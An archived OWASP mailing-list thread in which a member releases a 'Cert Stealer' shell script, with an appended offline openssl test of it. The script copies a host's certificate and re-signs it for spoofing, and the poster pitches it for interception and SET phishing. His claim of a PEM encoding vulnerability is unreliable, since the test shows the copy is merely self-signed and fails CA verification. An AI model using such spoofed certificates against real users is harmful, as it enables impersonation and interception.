[Owasp-leaders] Cert Stealer Released

Gregory Disney gregory.disney at owasp.org
Thu Dec 26 19:55:48 UTC 2013


The cert I embed the key into is a cert from a remote host, saved as a 
PEM. I wouldn't have to do the PKCS12 conversion if I had the private 
key (I embed the key so openssl doesn't give key-mismatch errors). Mostly 
I use this tool for running the same style of attack Snowden used. It is 
also useful for SET: you can set your SSL to the site you wish to social 
engineer.
On 12/26/13, 11:40 AM, Abbas Naderi wrote:
> Maybe the PEM you’re using is not a cert, but a private key. They are 
> both encoded into PEM files. If you have the private key, then you 
> don’t need to exploit it! You already have it.
>
> And BTW, what's the practical use of this? I mean, have you used it 
> anywhere? How can it be used to exploit something?
> -A
> On Dec 26, 2013, at 2:38 PM, Gregory Disney <gregory.disney at owasp.org 
> <mailto:gregory.disney at owasp.org>> wrote:
>
>> # 1. Save the remote host's certificate (chain) as PEM
>> openssl s_client -showcerts -connect $host:$port > $keyring.pem;
>> # 2. Extract the public key from the fetched cert
>> openssl x509 -in $keyring.pem  -pubkey > $keyring.cer;
>> # 3. Import the fetched cert into a Java keystore and generate a fresh RSA key pair next to it
>> keytool -keystore $ks --importcert --alias $keyring.pem -file 
>> $keyring.pem -storepass $passwd -noprompt;
>> keytool -genkey -alias $keyring.key -keyalg RSA -keystore $ks 
>> -storepass $passwd -noprompt
>> # 4. Export the new key pair as PKCS12 and convert it to PEM with openssl
>> keytool -v -importkeystore -srckeystore $ks -srcalias $keyring.key 
>> -destkeystore $keyring.p12 -file $keyring.p12 -deststoretype PKCS12 
>> -storepass $passwd -noprompt
>> openssl pkcs12 -in $keyring.p12 -out $keyring.key -passin pass:$passwd
>> # 5. Append the new private key to the fetched cert and re-sign the cert with it
>> echo "Stealing CA"
>> cat $keyring.key >> $keyring.pem
>> openssl x509 -inform pem -in $keyring.pem -out ca-$keyring.crt 
>> -signkey $keyring.key -CA $keyring.key -CAcreateserial
>>
>> This is exactly how I do it. They are checking for the public key and 
>> private key; I'm not sure why openssl lets you re-sign as a key. But 
>> here is the source for the exploit.
>>
>> On 12/26/13, 11:35 AM, Abbas Naderi wrote:
>>> I didn’t quite understand. What does the encoding vulnerability 
>>> expose? SSL certs are public keys plus a bunch of other data. There 
>>> is no private key inside to extract and re-sign another certificate 
>>> with.
>>> -A
>>> On Dec 26, 2013, at 2:32 PM, Gregory Disney 
>>> <gregory.disney at owasp.org <mailto:gregory.disney at owasp.org>> wrote:
>>>
>>>> I think a fair description would be that it simplifies spoofing certs. 
>>>> This started out as a proof of concept a year ago when I realized 
>>>> there was a vulnerability in the PEM encoding of SSL certs, so I 
>>>> chain-loaded a Java key store which was converted to a key, then 
>>>> re-signed the cert with the chain-loaded key, thus keeping the 
>>>> context of the original certificate with a hijacked authority.
>>>> On 12/26/13, 11:21 AM, Abbas Naderi wrote:
>>>>> Well a description of what this does would be a good idea to start 
>>>>> with…
>>>>> -A
>>>>> On Dec 26, 2013, at 2:18 PM, Gregory Disney 
>>>>> <gregory.disney at owasp.org <mailto:gregory.disney at owasp.org>> wrote:
>>>>>
>>>>>> I'm working on the documentation. It works by turning a 
>>>>>> keytool PKCS12 into an openssl key, then embedding the key in the root 
>>>>>> CA and re-signing with the embedded key.
>>>>>> On 12/26/13, 10:47 AM, Dinis Cruz wrote:
>>>>>>>
>>>>>>> Hi Gregory, where can I find the details of how this works?
>>>>>>>
>>>>>>> Thx
>>>>>>>
>>>>>>> Dinis
>>>>>>>
>>>>>>> On 26 Dec 2013 07:44, "Gregory Disney" <gregory.disney at owasp.org 
>>>>>>> <mailto:gregory.disney at owasp.org>> wrote:
>>>>>>>
>>>>>>>     Screen shot of successfully spoofed certs:
>>>>>>>     http://image-store.slidesharecdn.com/f6ff3390-6dfc-11e3-8ed6-22000a9193db-original.png
>>>>>>>     Each of these certs has been tested and is capable of
>>>>>>>     creating SSL sessions.
>>>>>>>     Cert Stealer:
>>>>>>>     https://gist.github.com/gdisneyleugers/8129304
>>>>>>>     -Greg
>>>>>>>     _______________________________________________
>>>>>>>     OWASP-Leaders mailing list
>>>>>>>     OWASP-Leaders at lists.owasp.org
>>>>>>>     <mailto:OWASP-Leaders at lists.owasp.org>
>>>>>>>     https://lists.owasp.org/mailman/listinfo/owasp-leaders
>>>>>>>

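The pipeline quoted in the thread, reproduced with openssl alone so the output of the "Stealing CA" step can be inspected offline. This is an added example written for this archive page, not the Cert Stealer gist; the CA name "Example Root CA", the host name "victim.example" and the file names are made up. It stands a throwaway CA and a leaf certificate in for the remote host, generates a fresh key in place of the keytool/PKCS12 round trip, runs openssl x509 -signkey over the leaf as the last line of the script does, and then checks the three things a practitioner would want to know: what -signkey leaves alone (the subject), what it rewrites (per the openssl x509 man page, the issuer becomes the subject and the public key becomes the signing key's), and whether a client that validates the chain against the real CA accepts the result.

```shell
#!/bin/sh
# Added example for this page, not the Cert Stealer gist. Reproduces the
# re-signing step with openssl alone (no keytool, no network) and inspects
# the result. "Example Root CA" and "victim.example" are made-up names.
set -eu

# Scratch directory; removed on exit unless the caller supplied WORK.
if [ -z "${WORK:-}" ]; then
    WORK=$(mktemp -d)
    trap 'rm -rf "$WORK"' EXIT
fi

# Throwaway CA, a leaf it issued (stand-in for the certificate s_client
# would fetch), a fresh "attacker" key, and the re-signed copy.
build_fixtures() {
    if [ -f "$WORK/spoofed.crt" ]; then return 0; fi
    openssl req -x509 -newkey rsa:2048 -nodes -keyout "$WORK/ca.key" \
        -out "$WORK/ca.crt" -subj "/CN=Example Root CA" -days 30 >/dev/null 2>&1
    openssl req -newkey rsa:2048 -nodes -keyout "$WORK/victim.key" \
        -out "$WORK/victim.csr" -subj "/CN=victim.example" >/dev/null 2>&1
    openssl x509 -req -in "$WORK/victim.csr" -CA "$WORK/ca.crt" \
        -CAkey "$WORK/ca.key" -CAcreateserial -out "$WORK/victim.crt" \
        -days 30 >/dev/null 2>&1
    # The keytool -genkey / -importkeystore / pkcs12 round trip in the script
    # only produces a brand-new private key; generate one directly.
    openssl genrsa -out "$WORK/attacker.key" 2048 >/dev/null 2>&1
    # The "Stealing CA" step: -signkey self-signs the input certificate with
    # the supplied key (issuer := subject, public key := that key's).
    openssl x509 -in "$WORK/victim.crt" -signkey "$WORK/attacker.key" \
        -days 30 -out "$WORK/spoofed.crt" >/dev/null 2>&1
}

# field <cert file in $WORK> <-subject|-issuer|-pubkey>
# Strips the "subject=" / "issuer=" prefix so the two can be compared.
field() {
    openssl x509 -in "$WORK/$1" -noout "$2" | sed -e 's/^subject=//' -e 's/^issuer=//'
}

# The victim's subject (and any extensions) survive the re-signing...
spoofed_keeps_subject() {
    [ "$(field spoofed.crt -subject)" = "$(field victim.crt -subject)" ]
}

# ...but the certificate is now self-issued; the real issuer is gone...
spoofed_is_self_issued() {
    [ "$(field spoofed.crt -issuer)" = "$(field spoofed.crt -subject)" ] &&
    [ "$(field spoofed.crt -issuer)" != "$(field victim.crt -issuer)" ]
}

# ...and it carries the attacker's public key, not the host's.
spoofed_key_is_attackers() {
    attacker_pub=$(openssl pkey -in "$WORK/attacker.key" -pubout 2>/dev/null)
    [ "$(field spoofed.crt -pubkey)" = "$attacker_pub" ] &&
    [ "$(field spoofed.crt -pubkey)" != "$(field victim.crt -pubkey)" ]
}

# verifies_against_ca <cert file in $WORK>: succeeds only if a client that
# trusts ca.crt would accept the certificate (openssl prints "<file>: OK").
verifies_against_ca() {
    openssl verify -CAfile "$WORK/ca.crt" "$WORK/$1" 2>&1 | grep -q ': OK$'
}

main() {
    build_fixtures
    for check in spoofed_keeps_subject spoofed_is_self_issued spoofed_key_is_attackers; do
        if "$check"; then echo "$check: yes"; else echo "$check: no"; fi
    done
    for f in victim.crt spoofed.crt; do
        if verifies_against_ca "$f"; then echo "$f: accepted by a client trusting ca.crt"
        else echo "$f: rejected by a client trusting ca.crt"; fi
    done
}

main
```

Run it with a stock openssl; no keystore or network is needed. The genuine leaf verifies, the re-signed copy does not, and the reason is visible in the fields: the subject is intact, which is what the screenshots in the thread show, while the issuer and the public key are no longer the original CA's and the original host's.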